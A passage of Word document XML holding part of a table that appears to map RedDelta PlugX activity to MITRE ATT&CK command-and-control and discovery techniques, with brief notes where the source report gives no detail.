                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BD8A6D7" w14:textId="0607FD46" w:rsidR="0090306D" w:rsidRPr="00F808AD" w:rsidRDefault="00B42656" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidR="00992EC7" w:rsidRPr="00992EC7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>P-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="738C2F53" w14:textId="77777777" w:rsidR="0090306D" w:rsidRDefault="0090306D" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>See also above</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6400787D" w14:textId="77777777" w:rsidR="0090306D" w:rsidRDefault="0090306D" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="37234AC2" w14:textId="5D247B5B" w:rsidR="0090306D" w:rsidRPr="007263B6" w:rsidRDefault="001C583E" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="0090306D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>……</w:t>
            </w:r>
            <w:r w:rsidR="0090306D" w:rsidRPr="007263B6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> which ultimately leads to the execution of the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="0090306D" w:rsidRPr="007263B6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>RedDelta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="0090306D" w:rsidRPr="007263B6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="0090306D" w:rsidRPr="007263B6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>PlugX</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="0090306D" w:rsidRPr="007263B6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35E31B41" w14:textId="77777777" w:rsidR="0090306D" w:rsidRDefault="0090306D" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007263B6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>variant in memory</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C7ABC1F" w14:textId="77777777" w:rsidR="0090306D" w:rsidRDefault="0090306D" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="418592E5" w14:textId="0B099BE7" w:rsidR="0090306D" w:rsidRPr="00F808AD" w:rsidRDefault="0090306D" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0090306D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">We are </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>not told how so this is a dummy technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E731E0" w:rsidRPr="00ED5880" w14:paraId="59F40A03" w14:textId="77777777" w:rsidTr="007D27AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71744A51" w14:textId="47A68CE5" w:rsidR="00E731E0" w:rsidRDefault="0027690D" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1553ECE8" w14:textId="64726A91" w:rsidR="00E731E0" w:rsidRDefault="001C583E" w:rsidP="0090306D">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&amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FB42DE9" w14:textId="03C68F40" w:rsidR="00E731E0" w:rsidRDefault="001C583E" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C583E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1573.001</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001C583E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Encrypted Channel: Symmetric Cryptography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E52353C" w14:textId="00E1F84E" w:rsidR="00E731E0" w:rsidRDefault="001C583E" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42D126B9" w14:textId="77777777" w:rsidR="00E731E0" w:rsidRPr="00F808AD" w:rsidRDefault="00E731E0" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CC75E92" w14:textId="56BBFF4C" w:rsidR="00E731E0" w:rsidRDefault="007367C1" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3783FF4D" w14:textId="4C4F14E4" w:rsidR="00E731E0" w:rsidRPr="00F808AD" w:rsidRDefault="00992EC7" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00992EC7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5187582A" w14:textId="77777777" w:rsidR="00E731E0" w:rsidRDefault="001C583E" w:rsidP="0090306D">
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>RedDelta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> uses RC4 encryption</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DE5F4FA" w14:textId="17D9D8D4" w:rsidR="007367C1" w:rsidRDefault="007367C1" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Out message/In message</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C583E" w:rsidRPr="00ED5880" w14:paraId="27A4F293" w14:textId="77777777" w:rsidTr="007D27AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07F42911" w14:textId="16711C6F" w:rsidR="001C583E" w:rsidRDefault="001C583E" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CD834C3" w14:textId="67E12C17" w:rsidR="001C583E" w:rsidRDefault="001C583E" w:rsidP="0090306D">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&amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D6CF089" w14:textId="39D86E4D" w:rsidR="001C583E" w:rsidRPr="001C583E" w:rsidRDefault="007367C1" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">T1071.001 </w:t>
            </w:r>
            <w:r w:rsidRPr="007367C1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Application Layer Protocol: Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67548D7C" w14:textId="30E9D82F" w:rsidR="001C583E" w:rsidRDefault="007367C1" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31C4C675" w14:textId="77777777" w:rsidR="001C583E" w:rsidRPr="00F808AD" w:rsidRDefault="001C583E" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64FE4C5F" w14:textId="1617593F" w:rsidR="001C583E" w:rsidRDefault="007367C1" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AC4B880" w14:textId="4BCE3923" w:rsidR="001C583E" w:rsidRPr="00992EC7" w:rsidRDefault="00992EC7" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00992EC7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37E6ADC3" w14:textId="7C266E4F" w:rsidR="001C583E" w:rsidRDefault="007367C1" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>RedDelta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> uses HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007367C1" w:rsidRPr="00ED5880" w14:paraId="49CB627A" w14:textId="77777777" w:rsidTr="007D27AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A8478DE" w14:textId="1A3DD009" w:rsidR="007367C1" w:rsidRDefault="007367C1" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="671D92F8" w14:textId="206BA3C2" w:rsidR="007367C1" w:rsidRDefault="00D3430D" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D3430D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D3430D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D3430D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="749C2861" w14:textId="4759109A" w:rsidR="007367C1" w:rsidRDefault="007D27AE" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D27AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007D27AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1049 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007D27AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> System Network Connections Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25C60DD9" w14:textId="32297218" w:rsidR="007367C1" w:rsidRDefault="00300ECF" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A0DF402" w14:textId="77777777" w:rsidR="007367C1" w:rsidRPr="00F808AD" w:rsidRDefault="007367C1" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4456B0B7" w14:textId="560FB337" w:rsidR="007367C1" w:rsidRDefault="00300ECF" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CC63AF7" w14:textId="48888DED" w:rsidR="007367C1" w:rsidRPr="00992EC7" w:rsidRDefault="00B42656" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidR="00992EC7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>P-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BD0F171" w14:textId="65281E9B" w:rsidR="007367C1" w:rsidRDefault="007F11BC" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[5] </w:t>
            </w:r>
            <w:r w:rsidR="007D27AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">Report has no info on action taken so </w:t>
            </w:r>
            <w:r w:rsidR="00341F66">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>a simple example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D27AE" w:rsidRPr="00ED5880" w14:paraId="15422D4C" w14:textId="77777777" w:rsidTr="007D27AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E74111B" w14:textId="6C360253" w:rsidR="007D27AE" w:rsidRDefault="007D27AE" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55C11545" w14:textId="002C47C6" w:rsidR="007D27AE" w:rsidRDefault="00D3430D" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D3430D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D3430D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D3430D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B59D773" w14:textId="328C23AF" w:rsidR="007D27AE" w:rsidRDefault="007D27AE" w:rsidP="0090306D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D27AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007D27AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1082 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007D27AE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
